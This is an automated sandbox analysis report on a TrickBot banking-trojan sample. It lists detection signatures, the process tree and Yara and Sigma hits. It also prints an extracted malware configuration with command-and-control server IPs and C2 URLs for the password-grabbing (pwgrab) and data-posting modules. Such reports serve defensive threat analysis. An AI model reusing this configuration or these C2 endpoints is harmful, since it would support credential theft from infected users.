
Windows Analysis Report dngqoAXyDd.exe

Overview

General Information

Sample Name: dngqoAXyDd.exe
Analysis ID: 516930
MD5: 0afbb383c5cea9f11202d572141bb0f4
SHA1: 148266112b25087f10ac1124ea32630e48fb0bd9
SHA256: 6a910ec8055b3844e3dd14c7af08a68110abc9395a88ab9199e69ed07be27210

Detection

TrickBot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Multi AV Scanner detection for submitted file
Found detection on Joe Sandbox Cloud Basic with higher score
Sigma detected: Suspect Svchost Activity
Writes to foreign memory regions
Hijacks the control flow in another process
May check the online IP address of the machine
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Sigma detected: Suspicious Svchost Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64native
  • dngqoAXyDd.exe (PID: 9000 cmdline: "C:\Users\user\Desktop\dngqoAXyDd.exe" MD5: 0AFBB383C5CEA9F11202D572141BB0F4)
    • wermgr.exe (PID: 5016 cmdline: C:\Windows\system32\wermgr.exe MD5: F7991343CF02ED92CB59F394E8B89F1F)
      • svchost.exe (PID: 1728 cmdline: C:\Windows\system32\svchost.exe MD5: F586835082F632DC8D9404D83BC16316)
    • cmd.exe (PID: 2076 cmdline: C:\Windows\system32\cmd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 6472 cmdline: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\GNU-Rach-559H\cmdrun.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"ver": "100019", "gtag": "top147", "servs": ["65.152.201.203:443", "185.56.175.122:443", "46.99.175.217:443", "179.189.229.254:443", "46.99.175.149:443", "181.129.167.82:443", "216.166.148.187:443", "46.99.188.223:443", "128.201.76.252:443", "62.99.79.77:443", "60.51.47.65:443", "24.162.214.166:443", "45.36.99.184:443", "97.83.40.67:443", "184.74.99.214:443", "103.105.254.17:443", "62.99.76.213:443", "82.159.149.52:443"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAABbfmkJRvwyw7iFkX40hL2HwsUeOSZZZo0FRRWGkY6J1+gf3YKq13Ee4sY3Jb9/0myCr0MwzNK1K2l5yuY87nW29Q/yjMJG0ISDj0HNBC3G+ZGta6Oi9QkjCwnNGbw2hQ4="}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Process Memory Space: wermgr.exe PID: 5016 | JoeSecurity_Trickbot_1 | Yara detected Trickbot | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started | Author: David Burkett | Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\wermgr.exe, ParentImage: C:\Windows\System32\wermgr.exe, ParentProcessId: 5016, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 1728
Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\wermgr.exe, ParentImage: C:\Windows\System32\wermgr.exe, ParentProcessId: 5016, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 1728

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp | Malware Configuration Extractor: Trickbot {"ver": "100019", "gtag": "top147", "servs": ["65.152.201.203:443", "185.56.175.122:443", "46.99.175.217:443", "179.189.229.254:443", "46.99.175.149:443", "181.129.167.82:443", "216.166.148.187:443", "46.99.188.223:443", "128.201.76.252:443", "62.99.79.77:443", "60.51.47.65:443", "24.162.214.166:443", "45.36.99.184:443", "97.83.40.67:443", "184.74.99.214:443", "103.105.254.17:443", "62.99.76.213:443", "82.159.149.52:443"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAABbfmkJRvwyw7iFkX40hL2HwsUeOSZZZo0FRRWGkY6J1+gf3YKq13Ee4sY3Jb9/0myCr0MwzNK1K2l5yuY87nW29Q/yjMJG0ISDj0HNBC3G+ZGta6Oi9QkjCwnNGbw2hQ4="}
Yara detected Trickbot
Source: Yara match | File source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
Source: Yara match | File source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for submitted file
Source: dngqoAXyDd.exe | Virustotal: Detection: 27%
Source: dngqoAXyDd.exe | ReversingLabs: Detection: 28%
Source: dngqoAXyDd.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown | HTTPS traffic detected: 46.99.175.217:443 -> 192.168.11.20:49778 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 24.45.255.9:443 -> 192.168.11.20:49786 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 202.58.199.82:443 -> 192.168.11.20:49800 version: TLS 1.2
Source: dngqoAXyDd.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\sample exe lego\correctmodel.pdb source: dngqoAXyDd.exe
Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECD0960 FindFirstFileW,FindNextFileW,
Source: C:\Windows\System32\wermgr.exe | Code function: 3_2_000001767ECC7120 FindFirstFileW,FindNextFileW,
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc esp
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec ecx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then cmp dword ptr [eax], ecx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then mov byte ptr [esp+ecx+70h], cl
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc esp
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc esp
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then mov ebx, edx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc ebp
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx ecx, byte ptr [ebp-07h]

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.11.20:49778 -> 46.99.175.217:443
Source: Traffic | Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.11.20:49809 -> 103.75.32.173:443
May check the online IP address of the machine
Source: unknown | DNS query: name: ip.anysrc.net
Source: Joe Sandbox View | ASN Name: IPKO-ASAL
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View | IP Address: 46.99.175.217
Source: Joe Sandbox View | IP Address: 116.203.16.95
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49800
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.14.2
    Date: Sat, 06 Nov 2021 14:12:52 GMT
    Content-Length: 9
    Connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden
    Server: nginx/1.14.2
    Date: Sat, 06 Nov 2021 14:14:12 GMT
    Content-Length: 9
    Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 46.99.175.217 (50 identical entries)
Source: Cookies.bak.13.dr | String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: Cookies.bak.13.dr | String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: Cookies.bak.13.dr | String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://103.11.218.199:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://103.111.83.86:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://103.75.32.173:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://110.38.58.198:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://114.7.243.26:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://116.206.62.138:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://117.54.140.98:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://138.94.162.29:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://139.255.41.122:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://175.184.232.234:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://186.96.153.223:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://190.183.60.164:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://196.44.109.73:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://202.152.56.10:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://206.251.37.27:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://27.109.116.144:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://36.95.73.109:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://45.115.174.234:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://45.115.174.60:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://45.116.68.109:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://45.221.8.171:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://64.64.150.203:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp, wermgr.exe, 00000003.00000002.14252607616.0000017631B36000.00000004.00000040.sdmp | String found in binary or memory: http://80.210.26.17:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://96.9.69.207:443
Source: wermgr.exe, 00000003.00000002.14255125858.0000017632132000.00000004.00000040.sdmp | String found in binary or memory: http://96.9.74.169:443
Source: History.bak.13.dr | String found in binary or memory: http://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=lib
Source: History.bak.13.dr | String found in binary or memory: http://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=libDriver
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000003.00000003.10158119791.000001767EE18000.00000004.00000001.sdmp | String found in binary or memory: http://ip.anysrc.net/
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp | String found in binary or memory: http://ip.anysrc.net/plain
Source: History.bak.13.dr | String found in binary or memory: http://office.com/setup
Source: History.bak.13.dr | String found in binary or memory: http://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: History.bak.13.dr | String found in binary or memory: http://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=
Source: History.bak.13.dr | String found in binary or memory: http://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=Driver
Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp | String found in binary or memory: https://202.58.199.82/S/6a
Source: wermgr.exe, 00000003.00000003.10158605588.000001767EE77000.00000004.00000001.sdmp | String found in binary or memory: https://202.58.199.82/roviderg/
Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmp, wermgr.exe, 00000003.00000003.10158605588.000001767EE77000.00000004.00000001.sdmp | String found in binary or memory: https://202.58.199.82/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/
Source: wermgr.exe, 00000003.00000002.14258955412.000001767EEA2000.00000004.00000020.sdmp, wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp | String found in binary or memory: https://202.58.199.82/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabc64/
Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmp | String found in binary or memory: https://202.58.199.82:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/
Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmp | String found in binary or memory: https://202.58.199.82:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabc64/
Source: wermgr.exe, 00000003.00000002.14257936566.000001767EDF4000.00000004.00000020.sdmp | String found in binary or memory: https://24.4
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp | String found in binary or memory: https://24.45.255.9/
Source: wermgr.exe, 00000003.00000003.9460440503.000001767EE9B000.00000004.00000001.sdmp | String found in binary or memory: https://24.45.255.9/index.html
Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmp | String found in binary or memory: https://24.45.255.9:443/index.html
Source: wermgr.exe, 00000003.00000003.10159260701.00000176321C5000.00000004.00000001.sdmp | String found in binary or memory: https://24.45.255.9:443/login.cgi?uri=/index.html#
Source: wermgr.exe, 00000003.00000002.14255875326.00000176321EA000.00000004.00000001.sdmp, wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp | String found in binary or memory: https://46.99.175.217/
Source: wermgr.exe, 00000003.00000002.14257724203.000001767EDDE000.00000004.00000020.sdmp | String found in binary or memory: https://46.99.175.217/rovider
Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp | String found in binary or memory: https://46.99.175.217/roviders/
Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp | String found in binary or memory: https://46.99.175.217/roviderw/
Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp | String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp | String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/g
Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmp | String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/t
Source: wermgr.exe, 00000003.00000003.10158119791.000001767EE18000.00000004.00000001.sdmp, wermgr.exe, 00000003.00000003.9460390964.000001767EE92000.00000004.00000001.sdmp | String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/NAT%20status/clien
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp | String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//
Source: wermgr.exe, 00000003.00000002.14257936566.000001767EDF4000.00000004.00000020.sdmp | String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//0u0u
Source: wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp | String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//Q
Source: wermgr.exe, 00000003.00000002.14257825391.000001767EDE7000.00000004.00000020.sdmp, wermgr.exe, 00000003.00000002.14258603827.000001767EE77000.00000004.00000020.sdmp | String found in binary or memory: https://46.99.175.217/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/VERS//
Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmp | String found in binary or memory: https://46.99.175.217:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/dpost/
Source: wermgr.exe, 00000003.00000002.14255586044.00000176321C0000.00000004.00000001.sdmp | String found in binary or memory: https://46.99.175.217:443/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/DEBG//
Source: Web Data.bak.13.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: History.bak.13.dr | String found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
Source: History.bak.13.dr | String found in binary or memory: https://aka.office.com/office/url/setup
Source: History.bak.13.dr | String found in binary or memory: https://aka.office.com/office/url/setupMicrosoft
Source: History.bak.13.dr | String found in binary or memory: https://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=lib
Source: History.bak.13.dr | String found in binary or memory: https://alldrivers4devices.net/download.php?driver=Drv5609xx-zip&key=libDriver
Source: History.bak.13.dr | String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: Web Data.bak.13.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: History.bak.13.dr | String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: History.bak.13.dr | String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: History.bak.13.dr | String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: Web Data.bak.13.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data.bak.13.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.bak.13.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wermgr.exe, 00000003.00000003.9460033673.00000176321DB000.00000004.00000001.sdmp | String found in binary or memory: https://itunes.apple.com/us/app/umobile-ubnt/id1183022489?mt=8
Source: History.bak.13.dr | String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: Login Data.bak.13.dr | String found in binary or memory: https://login.live.com/
Source: Login Data.bak.13.dr | String found in binary or memory: https://login.live.com//
Source: Login Data.bak.13.dr | String found in binary or memory: https://login.live.com/https://login.live.com/
Source: History.bak.13.dr | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
Source: History.bak.13.dr | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
Source: History.bak.13.dr | String found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
Source: Login Data.bak.13.dr | String found in binary or memory: https://login.live.com/v104
Source: History.bak.13.dr | String found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
Source: History.bak.13.dr | String found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
Source: History.bak.13.dr | String found in binary or memory: https://office.com/setup
Source: History.bak.13.dr | String found in binary or memory: https://office.com/setupMicrosoft
Source: History.bak.13.dr | String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: History.bak.13.dr | String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlBIOS320.EXE
Source: History.bak.13.dr | String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
Source: History.bak.13.dr | String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXEDownload:
Source: History.bak.13.dr | String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: wermgr.exe, 00000003.00000003.9460033673.00000176321DB000.00000004.00000001.sdmp | String found in binary or memory: https://play.google.com/store/apps/details?id=com.ubnt.umobile
Source: History.bak.13.dr | String found in binary or memory: https://recoveringlib.blogspot.com/2015/04/bios320exe-64-bit.html
Source: History.bak.13.dr | String found in binary or memory: https://recoveringlib.blogspot.com/2015/04/bios320exe-64-bit.htmlBios320.Exe
Source: History.bak.13.dr | String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: History.bak.13.dr | String found in binary or memory: https://setup.office.com/?ms.officeurl=setup
Source: History.bak.13.dr | String found in binary or memory: https://setup.office.com/?ms.officeurl=setupMicrosoft
Source: History.bak.13.dr | String found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: History.bak.13.dr | String found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2V
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSign
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
      Source: History.bak.13.drString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
      Source: Web Data.bak.13.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
      Source: Web Data.bak.13.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: History.bak.13.drString found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.html
      Source: History.bak.13.drString found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.htmlBios320.Exe
      Source: History.bak.13.drString found in binary or memory: https://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=
      Source: History.bak.13.drString found in binary or memory: https://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=Drive
      Source: History.bak.13.drString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
      Source: History.bak.13.drString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
      Source: History.bak.13.drString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/7
